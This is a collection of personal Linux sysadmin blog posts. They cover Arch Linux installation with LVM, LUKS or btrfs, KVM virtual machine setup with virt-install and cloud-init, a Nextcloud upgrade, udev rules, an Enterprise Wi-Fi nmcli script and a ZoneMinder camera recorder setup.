Arch Linux installation notes: three firesystem schemes

I started my Linux journey with Arch Linux about five years ago (Technically, I used Ubuntu 9.10 way back when, but that's a story for another day). As a newbie, installing Arch by hand was a pretty big deal for me. It taught me almost everything about Linux and open source software in general.

Overtime, I moved on from Arch to Debian/Ubuntu/Fedora, but I always keep a technical note on how to install Arch Linux. What drives me to revisit this topic? Well, because I decided to put Linux on an old MacBook Pro with Intel CPU. I can think of no better distro than Arch Linux: it is flexible, lightweight, and... did I mention it's Arch, btw?

This article focuses on installing Arch Linux base system on a laptop or desktop with a single hard drive, and with UEFI support. It uses one of three partition/firesystem schemes and one of two boot loaders (GRUB or systemd-boot). The scenarios are:

  1. LVM with ext4: no encryption
  2. LVM on LUKS: offers root partition encryption
  3. Btrfs on LUKS: above, and btrfs
  4. Encrypted EFI system partition with Unified Kernel Image

The purpose is to dual boot Arch Linux with MacOS, so encrypted EFI partition is out of the question here. I might write another article in the future about Unified Kernel Image.

When researching and refining my notes, I came across YouTube channel EF linux. He was such a great guy, concise and straight to the point. I also recommend his video about btrfs snapshot with timeshift.

So, without further ado, let me present my raw notes of installing Arch Linux in (late) 2023.


Live system stage

Preparation

wireless network config
Wi-Fi: iwctl (authenticates to Wi-Fi) or wifi-menu (netctl)
Ethernet: ArchISO's systemd-networkd and systemd-resolved should work out of the box

SSH remote install:
passwd to set root password
systemctl start sshd.service
ip addr to get IP address

Optional:
setfont ter-132b set larger font for HiDPI
timedatectl set-ntp true to ensure the system clock is accurate
ls /sys/firmware/efi/efivars verify boot mode (BIOS or UEFI)
cat /sys/firmware/efi/fw_platform_size another way to verify (64 or 32)

Partitioning

https://wiki.archlinux.org/title/Partitioning
https://wiki.archlinux.org/title/EFI_system_partition
https://wiki.archlinux.org/title/Btrfs
https://wiki.archlinux.org/title/Install_Arch_Linux_on_LVM
https://wiki.archlinux.org/title/Dm-crypt/Encrypting_an_entire_system

Boot partition

Partition the disk: create ESP (EFI system partition) and "Linux root" partition
cfdisk is TUI of fdisk
fdisk -l check existing disks/partitions
fdisk /dev/sd[X]

Format and mount:
mkfs.fat -F 32 /dev/sda1 format ESP to FAT32
mkdir -p /mnt/boot
mount /dev/sda1 /mnt/boot

Notes on ESP mount point:

  • /boot: cannot be encrypted; contains kernels, initramfs images, microcode, boot loader config files; supports dual boot with Windows/MacOS
  • /efi (historically /boot/efi): only boot loader config files
Mount point Partition Partition type GUID Size
/boot or /efi /dev/sda1 EFI system partition C12A7328-F81F-11D2-BA4B-00A0C93EC93B 300MB to 1GB
/ /dev/sda2 Linux root 4F68BCE3-E8CD-4DB1-96E7-FBCAF984B709 remainder

1. LVM

LVM with ext4 (no LUKS encryption), see Install Arch on LVM

  • create pv, vg and lv on /dev/sda2 (if lv will be formatted with ext4, leave 256 MiB space for e2scrub; see next section on how to)
  • format mkfs.ext4 /dev/VolGroup/root
  • mount mount /dev/VolGroup/root /mnt
  • note: swap and home logic volumes are optional

2. LVM on LUKS

LVM on LUKS

  • LUKS2
    cryptsetup luksFormat /dev/sda2
    cryptsetup open /dev/sda2 cryptroot
  • LVM
    pvcreate /dev/mapper/cryptroot
    pvdisplay/pvscan
    vgcreate VolGroup /dev/mapper/cryptroot
    lvcreate -L 100%FREE VolGroup -n root
    lvreduce -L -256M VolGroup/root ### if ext4, leave 256 MiB space for e2scrub
  • format and mount
    mkfs.ext4 /dev/VolGroup/root
    mount /dev/VolGroup/root /mnt

3. Btrfs on LUKS

Btrfs

  • LUKS2
    cryptsetup luksFormat /dev/sda2
    cryptsetup open /dev/sda2 cryptroot
  • Btrfs
    mkfs.btrfs -L archlinux /dev/mapper/cryptroot
    mount /dev/mapper/cryptroot /mnt
    cd /mnt
    btrfs subvolume create @            ## or root
    btrfs subvolume create @home   ## or home
    cd
    umount /mnt
    mkdir /mnt/home
    mount -o subvol=@,compress=zstd /dev/mapper/cryptroot /mnt
    mount -o subvol=@home,compress=zstd /dev/mapper/cryptroot /mnt/home

Install base system

(optionally) edit mirrors /etc/pacman.d/mirrorlist
pacstrap -K /mnt base linux linux-firmware amd/intel-ucode sudo lvm2 btrfs-progs nano optionally networkmanager

  • Kernels can be linux-lts or linux-zen
  • skip linux-firmware if it's a VM

FSTAB

genfstab -U /mnt >> /mnt/etc/fstab use -U or -L to define by UUID or labels, respectively
cat /mnt/etc/fstab to verify

Chroot stage

arch-chroot /mnt

Initramfs (mkinitcpio)

Workflow:
edit hooks in/etc/mkinitcpio.conf
re-generate mkinitcpio -P

See also:
mkinitcpio common hooks
kernel parameters

1. LVM

lvm2 package must be installed in the arch-chroot environment
"udev" and "lvm2" for busybox-based initramfs: HOOKS=(base udev ... block lvm2 filesystems)
"systemd" and "lvm2" for systemd-based initramfs: HOOKS=(base systemd ... block lvm2 filesystems)

2. LVM on LUKS

lvm2 package must be installed in the arch-chroot environment
"keyboard", "encrypt" and "lvm" for busybox-based initramfs: HOOKS=(base udev autodetect modconf kms keyboard keymap consolefont block encrypt lvm2 filesystems fsck)
"keyboard", "sd-encrypt" and "lvm" for systemd-based initramfs: HOOKS=(base systemd autodetect modconf kms keyboard sd-vconsole block sd-encrypt lvm2 filesystems fsck)

3. Btrfs on LUKS

btrfs-progs package must be installed in the arch-chroot environment
"keyboard" and "encrypt" for busybox-based initramfs
"keyboard" and "sd-encrypt" for systemd-based initramfs

For single device btrfs pool, "filesystem" hook is sufficient (no need for "btrfs" hook)
For multi device btrfs pool, use one of "udev", "systemd" or "btrfs" hooks. See common hooks

Additionally, edit /etc/fstab to add mount options: (get UUID by lsblk -f or blkid)

UUID=XXX / btrfs subvol=@,compress=zstd:9,discard=async,noatime,ssd
UUID=YYY /home btrfs subvol=@home,compress=zstd:9,discard=async,noatime,ssd

Boot loader

Installation:

  • systemd-boot is shipped with the systemd package which is a dependency of the base meta package
  • GRUB pacman -S grub efibootmgr
  • rEFInd: pacman -S refind-efi efibootmgr

Kernel parameters references:

1. LVM

Choose any boot loader
Kernel parameter root=/dev/VolGroup/root

2. LVM on LUKS

Grub install (assuming esp is /boot)
grub-install --target=x86_64-efi --efi-directory=/boot --bootloader-id=GRUB
grub-mkconfig -o /boot/grub/grub.cfg

(Optional) fallback boot path:
either use --removable flag
or mkdir *esp*/EFI/BOOT and cp *esp*/EFI/GRUB/grubx64.efi *esp*/EFI/BOOT/BOOTX64.EFI

Kernel parameters: https://wiki.archlinux.org/title/Dm-crypt/Encrypting_an_entire_system#Configuring_the_boot_loader_2
Get UUID by lsblk -f or blkid
Unlock encrypted root partition at boot: (get device-UUID refers to LUKS pratition /dev/sda2)
For encrypt hook: cryptdevice=UUID=<device-UUID>:cryptroot:allow-discards root=/dev/VolGroup/root
For sd-encrypt hook: rd.luks.name=<device-UUID>=cryptroot rd.luks.options=discard root=/dev/VolGroup/root

3. Btrfs on LUKS

Install systemd-boot: bootctl install optionally set --esp-path=/custom/esp
Automatic update: enable systemd-boot-update.service and/or add pacman hook

Configure nano /boot/loader/loader.conf

# default name must match filename /boot/loader/entries/arch.conf
default arch
timeout 3
console-mode max
# console-mode auto/keep
# editor no

Add loaders nano /boot/loader/entries/arch.conf add -lts for LTS kernel

title Arch Linux
linux   /vmlinuz-linux
initrd  /intel-ucode.img
# initrd  /amd-ucode.img
initrd  /initramfs-linux.img
# kernel parameters for btrfs on LUKS ("encrypt" hook), where XXX is /dev/sdb2, YYY is /dev/mapper/cryptroot
options cryptdevice=UUID=XXX:cryptroot:allow-discards root=/dev/mapper/VolGroup-root rw quiet splash
# kernel parameters for btrfs on LUKS ("sd-encrypt" hook), where XXX is /dev/sdb2, YYY is /dev/mapper/cryptroot
options rd.luks.name=XXX=cryptroot rd.luks.options=discard root=UUID=YYY rootflags=subvol=@ rw quiet splash

Note:

  • Fedora GRUB only has "rd.luks.name=", no "root=" nor "rootflags="; but Arch has to have these
  • Either set "rootflags=" here or btrfs subvolume set-default <subvolume-id> /

Fallback nano /boot/loader/entries/arch-fallback.conf; add -lts for LTS kernel

title Arch Linux (fallback initramfs)
...
initrd  /initramfs-linux-fallback.img
...

Time zone

From here on is easy, just follow Installation Guide

ln -sf /usr/share/zoneinfo/Canada/Toronto /etc/localtime to set timezone
hwclock -w -u to set time

Localization

nano /etc/locale.gen uncomment en_CA.UTF-8 and other needed locales
or
echo "en_CA.UTF-8 UTF-8" >> /etc/locale.gen
lastly
locale-gen to generate locale

nano /etc/locale.conf to set the LANG variable: LANG=en_US.UTF-8
or
optionally locale > /etc/locale.conf

Network configuration

echo MYHOSTNAME > /etc/hostname

nano /etc/hosts

127.0.0.1   localhost
::1     localhost
127.0.1.1   MYHOSTNAME.localdomain  MYHOSTNAME

either systemctl enable systemd-networkd.service systemd-resolved.service and follow some example configurations
or pacman -S networkmanager + systemctl enable NetworkManager

User and password

passwd for root We want passwordless root
ensure sudo package is installed
useradd -m -G wheel -s /bin/bash your_user
passwd your_user
EDITOR=nano visudo uncomment %wheel All=(All) All

Reboot

exit to exit chroot
umount -R /mnt optional but safe
reboot now

Post-install

Useful topics

systemd-boot: enable systemd-boot-update.service and/or add pacman hook

zram: replaces swap file or swap partition

Hibernation: (swap partition)
For "encrypt" hook: resume=/dev/VolGroup/swap (same format as root parameter)
systemd-boot ("sd-encrypt" hook): does not require additional kernel parameter with systemd >= v255

Snapper does not have command line tool; but has GRUB and rEFInd integration
Timeshift has a GUI as well as a command line tool

Simplify Linux VM installation on KVM/QEMU with virt-install and cloud-init

This is a follow-up post of my previous post about Windows VM installation. This one, surprise surprise, is about installing Linux VM.

I hate tedious and manual work, but sometimes it also doesn't make sense to spend time modifying an Ansible playbook that I probably will only use a few times. I find virt-install and cloud-init meet most of my needs when it comes to quickly spinning VMs up for testing. They offer simplicity with great flexibility. Within minutes I can create VMs for testing; if I want to go crazy, I can tell it to run Ansible during the first boot. Probably other automation tools as well.

For more serious stuff (like a production server), I will stick to Ansible for deployment and config management.


I will use Ubuntu as example for this tutorial. Debian/Fedora/CentOS Stream all have cloud editions. Download cloud image .img file

In a directory, create files meta-data and user-data (optionally vendor-data)

meta-data:

instance-id: <Your-ID> # not important; will not be in virtual machine's XML file
local-hostname: ubuntu.local.lan # this will be the FQDN

user-data docs and examples

users:
  - name: user1
    gecos: A super admin user on Ubuntu with nopassword sudo; 
    groups: [sudo, adm, audio, cdrom, dialout, floppy, video, plugdev, dip, netdev] 
    # other than sudo, the rest are ubuntu defaults
    shell: /bin/bash
    sudo: 'ALL=(ALL) NOPASSWD:ALL'
    lock_passwd: true # by default; disables password login
    chpasswd:
      expire: True
    ssh_authorized_keys:
      - <Your SSH pub key>

    # Another example
  - name: user2
    gecos: A generic admin user with sudo privilege but requires password
    groups: users,admin,wheel
    shell: /bin/bash
    sudo: 'ALL=(ALL) ALL'
    passwd: <hash of password> # mkpasswd --method=SHA-512 --rounds=4096 ## to get the hash
    ssh_authorized_keys:
      - ' <Your SSH pub key>'

package_update: true
package_upgrade: true # default command on Ubuntu is 'apt dist-upgrade'

# installing additional packages
packages:
  - ansible

# cloud-init is able to chain Ansible pull mode, if further configuration is needed
ansible:
  pull:
    url: "https://git.../xxx.git"
    playbook_name: xxx.yml

# run some commands on first boot
bootcmd: # very similar to runcmd, but commands run very early in the boot process, only slightly after a 'boothook' would run.
- some commands...
runcmd:
- systemctl daemon-reload

#swap: # by default, there is no swap
#  filename: /swap
#  size: "auto" # or size in bytes
#  maxsize: 2147484000   # size in bytes (2 Gibibyte)

# after system comes up first time; find IP in the output text
final_message: "The system is finally up, after $UPTIME seconds"

Finally, install the VM with cloud-init scripts and the cloud image we downloaded earlier. We are going to use user session qemu:///session and store the qcow2 image to ~/.local/share/libvirt/images/xxx.qcow2

virt-install \
  --connect qemu:///session \
  --name ubuntu \
  --vcpus 2 \ # --cpu MODEL[,+feature][,-feature][,match=MATCH][,vendor=VENDOR],...
  --memory 2048 \
  #--memballoon driver.iommu=on \
  --osinfo ubuntu22.04 \
  --network bridge=virbr0,model=virtio,driver.iommu=on \
  --graphics none \ # server install
  --disk ~/.local/share/libvirt/images/xxx.qcow2,size=30,backing_store=$PWD"/jammy-server-cloudimg-amd64.img",target.bus=virtio \
  --cloud-init user-data=$PWD"/user-data",meta-data=${PWD}"/meta-data"
  # to get the list of accepted OS variant `virt-install --osinfo list` debian11/fedora37/win10;

As usual, tweak any flags as you see fit.

Simplify Windows VM installation on KVM/QEMU with virt-install

This post is for you if you:

  • Need to quickly spin up a Windows virtual machine on a Linux server or workstation
  • Want to have performance optimized hardware settings for Windows VM
  • Don't want to click through a graphical interface such as virt-manager or Gnome Boxes every time

Well, I have the solution for you. From time to time I need a Windows VM for various purposes. Manually installing Windows on Linux KVM/QEMU is error-prune and time-consuming. To scratch my own itch, I have found and documented the way to reliably spin up Windows 10 and 11 VMs on any Linux machines.

Prerequisite

You will need to prepare the following things before you can start:

  • Windows 10 or 11 ISO image (nowadays you can download directly from Microsoft)
  • Virtualisation stack (sudo apt install qemu-kvm libvirt-daemon-system or sudo dnf install @virtualization)
  • virt-install command-line utility (provided by package virtinst on Debian/Ubuntu; virt-install on RHEL/Fedora)

virt-install command

The one-liner command for Windows 10 or 11. Adjust anything you see fit.

virt-install \
  --connect qemu:///session \
  --name win11-test \
  --boot uefi \
  --vcpus 4 \
  --cpu qemu64,-vmx \
  --memory 8192 \
  --memballoon driver.iommu=on \
  --osinfo win11 \
  --network bridge=virbr0,model=virtio,driver.iommu=on \
  --graphics spice \
  --noautoconsole \
  --cdrom Win11_22H2_English_x64v2.iso \
  --disk /home/ewon/.local/share/libvirt/images/win11-test.qcow2,size=50,target.bus=scsi,cache=writeback \
  --controller type=scsi,model=virtio-scsi,driver.iommu=on

Explanations:

  • To use KVM/QEMU system session (opposed to user session), specify --connect qemu:///system
  • The --boot uefi may not work reliably on some distros. For example, Fedora 37 (as I tested; Fedora 38 seems to be fine) would default to non-4M version of the OVMF file, resulting in non-working UEFI, hence no Windows 11 support. You may need to manually specify OVMF 4M file path using the following flags instead:
--machine q35 \
--boot loader=/usr/share/edk2/ovmf-4m/OVMF_CODE.fd,loader.readonly=yes,loader.type=pflash,nvram.template=/usr/share/edk2/ovmf-4m/OVMF_VARS.fd,loader_secure=yes \
# For Fedora, the OVMF 4M code is under /usr/share/edk2/ovmf-4m/OVMF_CODE.fd
# For Debian, the OVMF 4M code is under /usr/share/OVMF/OVMF_CODE_4M.fd
  • The --cpu flag for AMD is qemu64,-vmx; qemu64 enables Windows 11 support
  • The --osinfo flag can be either win10 or win11
  • Memory, network and disk controller all support IOMMU driver. Enable them for best performance
  • --graphics spice implies both --video=qxl and --channel=spicevmc; use it for best performance
  • --disk specify the path of qcow2 image file; use scsi (VirtIO) and writeback for best performance
  • --controller this is a rather important flag and often got overlooked. It has to be specified in order for scsi type disk (see --disk) to show up in Windows

Installation process

Follow the steps:

  • Paste the virt-install one-liner and hit enter. Ideally you would get the following output:
[ewon@ThinkPad]$ virt-install \
  --connect qemu:///session \
  --name win11-test \
  --boot uefi \
  --vcpus 4 \
  --cpu qemu64,-vmx \
  --memory 8192 \
  --memballoon driver.iommu=on \
  --osinfo win11 \
  --network bridge=virbr0,model=virtio,driver.iommu=on \
  --graphics spice \
  --noautoconsole \
  --cdrom Win11_22H2_English_x64v2.iso \
  --disk /home/ewon/.local/share/libvirt/images/win11-test.qcow2,size=50,target.bus=scsi,cache=writeback \
  --controller type=scsi,model=virtio-scsi,driver.iommu=on

Starting install...
Allocating 'win11-test.qcow2'                                                                     |    0 B  00:00:00 ...
Creating domain...                                                                               |    0 B  00:00:00

Domain is still running. Installation may be in progress.
You can reconnect to the console to complete the installation process.
  • We also need VirtIO drivers ISO attached to the VM during the installation. Since virt-install does not support loading multiple CDROM, we have to add it by using virt-manager (see below step) or directly editing the XML file (see how-to).
  • Shutdown the VM, edit the VM to include the second CDROM. Don't forget to enable SATA CDROM 1 (Windows ISO) as a boot device.
  • Start the VM and attach to graphical console. Windows Installer should appear.
  • If you manually specified --machine q35 and --boot loader= instead of --boot uefi, press Esc during boot, turn on Secure boot. While you are in UEFI settings, you can also adjust the screen resolution.
  • Follow Windows Installer, load drivers (vioscsi, NetKVM, Balloon) from virtio-win CD Drive and continue the installation process.

Post-installation and bugs

After Windows is installed, you want to install the VirtIO Guest Tools by running "virtio-win-gt-x64.msi" on the CDROM. It enables quality-of-life improvements such as dynamic resolution and two-way clipboard share. After that, you can remove the two CDROMs from the VM instance.

If the screen resolution still looks off, make sure the GPU is detected by Windows: check Windows Updates "receive updates for other Microsoft products..." then install graphics driver.

A downside of enabling UEFI firmware is that internal snapshot is not possible, see StackExchange for workarounds. Personally I don't bother to snapshot Windows VM anyway, since they are ephemeral. If I were to solve it, I would utilize filesystem snapshot (btrfs or ZFS).

I've possibly encountered other bugs/annoyances in the past that I didn't document. Since installing Windows VM is a somewhat "popular" practice for Linux users, I think most problems have been found and fixed, or at least worked around. Fire up your search engine if you couldn't solve something on your own.

Nextcloud upgrade woes

I have been self-hosting a Nextcloud instance for almost two years. It is a LAMP stack in a Proxmox LXC container. The container's operating system is Debian 11, with PHP 7.2.

Up until Nextcloud 25, everything is good. I always use the web updater for minor and major Nextcloud upgrades. It wasn't always smooth sails (sometimes I need to drop into the command line to do some post upgrade stuff), but generally speaking things work as intended.

A few months ago, I heard Nextcloud 26 would deprecated PHP 7.2, which means Debian 11 would not be able to upgrade to Nextcloud 26. That's fine, because Debian 12 was just around the horizon. I can rock 25 until Debian 12 comes out in the summer.

Fast forward to yesterday, I decided to upgrade my LXC container to Debian 12 and Nextcloud from 25 to 27, since both projects just released major upgrade within the last week. How exciting! Strangely enough, in the Nextcloud web interface, under "Administration settings", it doesn't even report new version 26 or 27.

I thought "Fine, I will upgrade Debian first and then use Nextcloud web updater". Turns out, Debian upgrade went very smoothly; all php packages were bumped from 7.2 to 8.2; reboot, done. However, Nextcloud cannot be opened, the web interface says something like "This version of Nextcloud is not compatible with PHP>=8.2. You are currently running 8.2.7". I start to grind my teeth as Nextcloud throws me into this hoop. "Fine, I will manually upgrade".

Following the How to upgrade guide, I downloaded latest.zip from Nextcloud website, and start the (painful) process:

  • turn maintenance mode on
  • unzip the file
  • copy everything except config and data into the document root located at var/www/nextcloud
  • make sure user, group and permissions are correct
  • added “apc.enable_cli = 1” to php cli config because of this bug
  • sudo -u www-data php occ upgrade

Of course it didn't work. I went to the web interface to see why, it says "Updates between multiple major versions are unsupported". You can hear me grinding my teeth from across the street.

Finally, after a lot of faffing, I downloaded Nextcloud 26.0.2 and successfully upgraded. However, that's not the end of misery. As per usually, major upgrade always needs some cleaning up. I got half a dozen warnings under "Administration settings", like php memory_limit, file hash mismatch, cron job failed, etc. They are not difficult to fix, just hella annoying.

Just thinking about 26-27 upgrade will put me through (some of) the rigmarole again, I'm already tired. This process is stressful and tedious, especially for something you only need to do every half a year. It periodically reminds me of the bad old days of system administration. Maybe I should've opted in the docker container deployment, I don't know.

On the flip side, thank goodness I have ZFS snapshots for the container and data directory. Should something goes wrong I can always roll back.

Practical udev rules

udev is a userspace subsystem on Linux that provides system administrators the ability to register userspace handlers for events. In other words, it allows custom actions to be executed upon device plugging in or removing. The device can be physical or virtual, as long as the device node lives under /dev directory.

udev rules can do pretty powerful things, and I'm only scratching the surface here. It's also amazing how little has changed in terms of syntax and capabilities, since 2004, when udev was first introduced. My learning resources include:

The motivation for me to learn udev systematically is due to work requirements. The custom Linux image we are building has to have specific devices shows up under certain /dev/tty path. This has to work on multiple physical hardware models, forward compatible with future devices, and most importantly, reliably. For example, pinpad shows up as /dev/ttyS6 and weightscale shows up as /dev/ttyS7, no matter what port it plugs into, or what distro it currently uses (CentOS or Ubuntu).

Monitoring events

Upon device plugging in and removing, we can monitor the verbose message by running the monitor sub command. Ideally, we should get important info such as device node (e.g., /dev/ttyUSB0) and environment variables such as "ACTION=add". If it's a USB device, we can also easily use lsusb to find vendorID and deviceID.

# udevadm monitor --environment --udev

The next step is to use device node path to find all information about this device and its parents.

# udevadm info --attribute-walk --path=$(udevadm info --query=path --name=/dev/ttyUSB0)

Note the message printed out by the above command: "Udevadm info starts with the device specified by the devpath and then walks up the chain of parent devices. It prints for every device found, all possible attributes in the udev rules key format. A rule to match, can be composed by the attributes of the device and the attributes from one single parent device."

It means exactly what it says.

Writing udev rules

Rule files go under /etc/udev/rules.d and fortunately the path and syntax are distro-agnostic. Some common match keys include "KERNEL/SUBSYSTEM/ATTR". Corresponding match keys for parent device are "KERNELS/SUBSYSTEMS/ATTRS" -- think of them as the plural form of the former words. For a complete list of match keys, refer to man page. A rule to create a symlink of a tty device looks like this:

SUBSYSTEM=="tty", KERNELS=="1-7.3", ATTRS{idVendor}=="067b", ATTRS{idProduct}=="23c3", SYMLINK+="ttyS2"

Here, only the first match key SUBSYTESM is against the device itself. Three other match keys are against a parent device. Note that all parent match keys have to come from the same parent, i.e., you cannot pick and choose match keys from different parent level devices.

Some common mistakes I found in other people's rule files:

  • it's not possible to change device name assigned by the kernel (e.g., NAME="myUSB"). The limitation is due to udev being only an userspace program.
  • most of the time, it's not necessary to specify ACTION=="add" environment variable match key.
  • for symlinks, it's usually not necessary to specify GROUP and MODE as soft links don't inherit ownership and permissions from the original file. Do it only when you know what you are doing.

Some advanced topics include:

  • string substitutions: udev uses printf-like string substitution operators
  • string matching: much like regular expression, accepts "*", "?" and "[]"
  • for removing events, try to leverage environment variable as match keys (ENV{KEY}=="VALUE"), as device attributes may not be accessible.
  • run external scripts/programs with RUN+="/path/to/executable"; think of it like a subshell, in which environment variables will differ from the ones in user shell, and no stdout/stderr.
  • for systemd intergration, refer to this Scripting with udev
  • OPTIONS+="last_rule" (I can't think of a possible use case)

Triggering new rules

After saving the rules files, manually trigger them against existing devices:

# udevadm trigger

You will find out instantly whether your rules work or not. Novice like myself may rely on trail-and-error to develop the first couple of rules, and I shamelessly confess that's how I learned udev. Once I get the basics, it feels like a second language.

Put your computer behind a firewall

A recent task from work required me to investigate a failure on a Linux machine deployed at customer's site.

I remoted into said machine, and quickly found out the problem. The log file for GDM (~/.cache/gdm/access.log) display manager grows to almost 100 GiB, driving the free space to zero. As a result, the system crashes, and log files got cleared. The cycle repeats.

Upon checking access.log, I found continuous failed login attempt to port 5900/TCP (default VNC server) from malicious bots. I also noticed thousands of failed SSH login attempt on root.

Turns out, this machine is assigned with a public IP address and open to the internet. By design, these Linux machines are never meant to be exposed to the open internet, but here we are. I could only try to patch up the firewall as much as I possible on the machine level, knowing it would inevitably be fallen into the hands of bot net.

Fingers crossed this particular client won't be owned by ransomware gangs, at least not soon.

Why I think Apple device is a better choice for normal people

I have been a FOSS user and advocate for a few years now. My main computers run Linux, and I work for a company on Linux related stuff. However, I always have Apple devices around, some are my own purchase (iPhones and iPads) and some are passed on to me (Macs). Before you read on, this post is about the reasoning behind recommending Apple devices for non-technical users. It is subjective and heavily biased. You have been warned.

As a long time (well, since around 2010) mobile user and tech follower, I have to give Apple credits for their entire hardware and software solutions, especially if you are looking at it from a "normie's" perspective. The longevity of OS support, good privacy settings and general availability of battery service are the main reasons for me to say this. Full disclaimer: I used to be a Google/Android fan; I’ve owned several Google branded Android phones, including Nexus 4, the Original Pixel and Pixel 3.

Take my own experience as an example: I purchased a refurbished iPhone 8 on 2020 (it originally came out in Fall 2018); been using it for 2.5 years now and just had battery replaced. Now that I can keep using the phone until the end of 2023, when (presumably) iOS 16 stops being supported. For a device I paid roughly $300 CAD, that's hell out of a value. A startling contrast would be the Google Pixle 3 (Fall 2018), which lost support from Google after a mere 3 years. People may argue that you can root it and flash it with LineageOS. While it is technically feasible and might be fun for some, I wouldn't even consider this option for normal users.

The next major point is default privacy. I know some people may disagree and even spit on the idea that Apple is good for privacy, but the truth is that Apple’s centrally controlled App Store is doing a lot better than its competitors. For some reason people are forced to use third-party app markets other than the Play Store (stock ROM defaults to third-party store; certain apps are not available on the Play Store; or Play Store is just not accessible). Third-party app markets are a wild west, let's put it mildly, and their popularity is high in certain regions of the world. Again, I am not endorsing Apple but contrasting it with its Android counterparts. You can make up your own conclusion.

Lastly, the ease of battery replacement and modest cost ($49 CAD for iPhone 8, at the time of writing). Give me an example of Android phone battery replacement service that is universally available across North America and costs less than $100 CAD for a 3+ year device? Probably rarer than a dinosaur. For an iPhone, I can just walk into an authorized store and have it serviced in less than 40 minutes.

All in all, personally I would only recommend Apple devices for my family members. Non-technical people also deserve reasonably good privacy, serviceable battery and more than 3 years of security updates out of a device.

Scripting with nmcli to connect RADIUS/WPA2 Enterprise Wi-Fi network

Recently there is a challenge that came from work. A batch of Linux client machines that are going to be deployed onsite need to connect to enterprise Wi-Fi with RADIUS authentication server.

Due to the sheer number of client machines, it is impractical to configure them individually using NetworkManager's GUI. So I decided to write a small script that automates this process by utilizing the command-line interface of NetworkManager: nmcli.

The script is very straightforward: it reads the desired IP address, turns on Wi-Fi radio and connect to a pre-configured Wi-Fi network with static IP and manual DNS/gateway settings.

#!/bin/bash

currentstaticip=$(ip -4 --brief address | grep -m1 192.168 | awk '{print $3}')
echo "The static IP address of $HOSTNAME is $currentstaticip"

# Turn Wi-Fi on and scan for Wi-Fi signals
nmcli radio wifi on
sleep 3

# Configure wlan0 connection
nmcli con modify wlan0 802-11-wireless.ssid THE-SSID

nmcli con modify wlan0 802-1x.eap peap 802-1x.identity THE-IDENTITY \
802-1x.password THE-PASSWD \
802-1x.phase2-auth mschapv2 \
802-11-wireless-security.key-mgmt wpa-eap

nmcli con modify wlan0 ipv4.method manual
nmcli con modify wlan0 ipv4.address $currentstaticip
nmcli con modify wlan0 ipv4.dns 8.8.8.8,1.1.1.1
nmcli con modify wlan0 ipv4.gateway 192.168.x.1

# Connect
nmcli con up "wlan0"
nmcli con modify "wlan0" wifi.hidden yes

The only part that required trial and error is the sequence in which security and identity information is supplied to the RADIUS server. Every RADIUS setup is different and what worked in this scenario may not work under a different setup. On the other hand, there's not a lot of scripting examples out on the internet that deal with enterprise Wi-Fi. All in all, it took me a few hours to read the man pages and come up with this solution.

Hope it will bring value to people who are struggling with similar problems.

Setting up ZoneMinder NVR

For the past year or so, I use BlueIris as my network video recorder (NVR) solution on a dedicated HP ProDesk computer, running Windows 10. BlueIris has proven to be a solid piece of software. Although I only use a fraction of its offerings, I still think it's worth the cost (yes, it's paid, proprietary and Windows-only). I had no plan to replace it any time soon.

That is, at least until yesterday, when the HP computer just died. Turns out, my cat sneaked into the basement a few weeks ago and urinated on my server rack, and the liquid got into the case and slowly eroded the motherboard. The desktop was lying horizontally on the top shelf of my rack and caught most of the liquid, saving all the equipment beneath it. It's pretty heroic, in a sense.

I took a picture of the the dead motherboard.

Well, it's time to pick a new NVR solution (preferably open source) and chug along with life. I had previously tried Shinobi and concluded that the web interface was not to my liking. I tried ZoneMinder as well on an i5 computer back then, but it was simply not powerful enough to drive motion detection on 3+ cameras.

Understanding the pain points

After running security camera systems for more than a year, I have figured out my use case and exactly what I need from an NVR system. I simply need it to:

  • Record 24/7 low-res footage on all cameras
  • Low maintenance effort
  • Low CPU usage and disk I/O (ideally)

What I thought I needed but actually don't:

  • GPU encoding/decoding (pass-through is good for me)
  • Motion detection (cats running around all the time, tons of false trigger)
  • High-res footage (nice to have, but low-res is good enough)
  • Multiple copies of backup (footage from weeks ago are not critically important)

With that in mind, I decide to give ZoneMinder another go. This time, with a minimum viable configuration.

Deciding the hosting infrastructure

With the HP desktop down, I only have three servers left: Dell PowerEdge R720 as main hypervisor with 8 hard drives in ZFS mirror vdev configuration; HP ProLiant DL360p Gen8 as a testing server; and a dedicated backup server running TrueNAS. I better not mess around with the backup server, and I don't want to occupy the testing server with mission critical tasks. The only logical choice is Dell R720.

ZoneMinder is a PHP web application running on top of LAMP stack, so it should have no problem running in a LXC container. In fact, this YouTube video shows exactly the same setup. External storage is something we have to configure, though, as discussed later in this post.

Installation

Follow the most recent guide on ZoneMinder wiki for either Ubuntu or Debian systems: add apt source list, install dependencies and ZoneMinder itself. Fire up a web browser and go to x.x.x.x/zm, or have a proxy in front of it and go to my-zonminder-url.tld/zm and you are greeted with a setup wizard. At the time of writing, the most recent stable version is v1.36.12 on Debian 11 Bullseye.

Before running the wizard, I would add external storage to the LXC container. By default, ZoneMinder stores "events" under /var/cache/zoneminder/events. This directory is owned by www-data user and group. In Proxmox, there is a neat trick to bind mount a path on the host system to the guest container. In this case, I created a ZFS dataset /tank/encrypted/zoneminder and bind mounted it to /var/cache/zoneminder/events in the container. I had to add the following line in the container config file (/etc/pve/lxc/Container_ID.conf):

mp0: /tank/encrypted/zoneminder,mp=/var/cache/zoneminder/events

Reboot the container; the external storage will show up.

We also need to fix the permissions of the storage directory. By default, the www-data user and group have UID and GID numbered at 33, which maps to 100033 on the host system. We could simply chown -R 100033:100033 /tank/encrypted/zoneminder on the host system and call it a day. Since I already have a ZFS dataset with 100033 UID/GID bind mounted to the Nextcloud container, I would go the extra mile by changing the UID/GID number of www-data user/group on ZoneMinder container to some number other than 33. The logic is that, if either container is compromised, their www-data user/group can not touch the other's bind mount storage path on the host system. It may sound overly cautions, but reducing attack vector is always a good practice.

Adding Reolink Cameras

I have a total of five Reolink 5MP cameras. This wiki page and this Reddit post show how to add Reolink cameras to ZoneMinder. If in doubt, use ONVIF auto detection. I find it much easier probing than messing around with RTSP/RTMP feed URL.

Each camera has a sub stream and a main stream. I record sub streams 24/7 and use main streams purely as monitors.

For me, the sub feed URL is:

rtsp://admin:password@IP:554/h264Preview_01_sub

The main feed URL is:

rtsp://admin:password@IP:554/h264Preview_01_main

Of course, substitute username and password based on your setup. The default username for Reolink cameras is "admin"; the default password is empty.

Wrap-up

I won't go into details on how to configure ZoneMinder because I know everyone's need is different. However, I suggest at least add a filter rule to purge events when disk gets full.

